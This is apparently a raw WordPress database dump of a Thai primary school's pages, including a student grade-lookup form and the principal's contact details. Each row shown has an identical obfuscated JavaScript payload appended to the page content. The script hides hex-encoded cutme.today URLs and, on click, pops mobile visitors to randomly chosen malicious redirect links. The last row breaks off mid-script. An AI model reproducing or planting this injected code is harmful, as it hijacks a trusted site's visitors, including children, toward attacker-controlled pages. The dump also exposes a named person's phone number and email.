(468,1,'2024-08-01 21:14:15','2024-08-01 14:14:15','<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"light-green-cyan\",\"width\":100} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-100\"><a class=\"wp-block-button__link has-light-green-cyan-background-color has-background wp-element-button\"><strong>ระบบดูคะแนน/เกรดนักเรียน</strong></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<div align=\'center\'><form action=\'https://a3301.obec.expert/services\' method=\'POST\' target=\'_blank\' > <div><input name=\'idcard\' style=\'text-align:center;\' type=\'text\' value=\'\' placeholder=\'เลขบัตร ปชช. 13 หลัก\' /></div> <div><input name=\'schoolid\' type=\'hidden\' value=\'33010169\' required /><button type=\'submit\'>ค้นหา</button></div> </form></div>\n<!-- /wp:html -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"459_7a1b50-06\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items459_7a1b50-06 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"459_d3e202-9f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-459_d3e202-9f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรอกเลขบัตรประจำตัวประชาชนนักเรียน 13 หลัก  แล้วกด \"ค้นหา\"</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2024-08-01 21:14:15','2024-08-01 14:14:15','',459,'http://pakhaeng.ssk.in.th/?p=468',0,'revision','',0),
(469,1,'2024-08-02 08:49:39','2024-08-02 01:49:39','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":690,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1-2.png\" alt=\"\" class=\"wp-image-690\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:generateblocks/headline {\"uniqueId\":\"cbd5a9a5\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"30px\"},\"backgroundColor\":\"#f78da7\",\"textColor\":\"#ffffff\",\"highlightTextColor\":\"#7bdcb5\",\"iconColor\":\"#fcb900\"} -->\n<h2 class=\"gb-headline gb-headline-cbd5a9a5 gb-headline-text\">ผู้บริหารสถานศึกษา</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p><strong>ชื่อ-สกุล : </strong>นางเสน่หา  พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ตำแหน่ง</strong> ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>โทรศัพท์</strong> :  093-325-2659</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>E-mail</strong> : phonsopha2509@gmail.com</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลผู้บริหาร','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3','','','2024-08-30 12:23:11','2024-08-30 05:23:11','',0,'http://pakhaeng.ssk.in.th/?page_id=469',0,'page','',0),
(470,1,'2024-08-02 08:49:39','2024-08-02 01:49:39','<!-- wp:contentviews/grid1 {\"blockId\":\"1ns2z0im\",\"offset\":\"0\",\"showThumbnail\":false,\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"postsPerPage\":\"1\",\"headingText\":\"ข้อมูลผู้บริหาร\",\"headingStyle\":\"heading5\"} /-->\n\n<!-- wp:shortcode -->\n[tmm name=\"%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4